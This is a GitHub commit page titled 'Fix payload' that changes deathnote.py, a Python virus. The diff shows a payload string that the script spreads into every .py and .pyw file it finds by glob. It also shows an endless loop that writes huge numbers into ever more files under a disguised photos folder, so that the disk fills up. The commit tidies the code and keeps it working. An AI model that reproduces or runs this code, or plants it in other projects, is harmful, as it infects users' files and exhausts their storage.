Skip to content

Commit

Permalink
Fix payload
Browse files Browse the repository at this point in the history
  • Loading branch information
Vaedz7 authored Mar 20, 2023
1 parent c3ce969 commit 071d1f1
Showing 1 changed file with 11 additions and 13 deletions.
24 changes: 11 additions & 13 deletions deathnote.py
Original file line number Diff line number Diff line change
Expand Up @@ -6,14 +6,13 @@

payload="""
def task():
m=999999
fc=1
fh="photos/pictures/2023/other/me/all/"
fpath="photos/pictures/2023/other/me/all/"
i=1
while fc != 0:
dn=open(fh+"dn"+str(fc), "w")
dn.write(str(m**999999))
dn=open(fpath+"dn"+str(i), "w")
dn.write(str(999999**999999))
dn.close()
fc=fc+1
i=i+1
task()
"""
spread_files = glob.glob('*.py') + glob.glob('*.pyw')
Expand Down Expand Up @@ -46,13 +45,12 @@ def task():
os.makedirs(dir4)

def task():
m=999999
fc=1
fh="photos/pictures/2023/other/me/trips/fun/important/all/"
while fc != 0:
dn=open(fh+"dn"+str(fc), "w")
dn.write(str(m**999999))
fpath="photos/pictures/2023/other/me/trips/fun/important/all/"
i=1
while True:
dn=open(fpath+"dn"+str(i), "w")
dn.write(str(999999**999999))
dn.close()
fc=fc+1
i=i+1

task()

0 comments on commit 071d1f1

Please sign in to comment.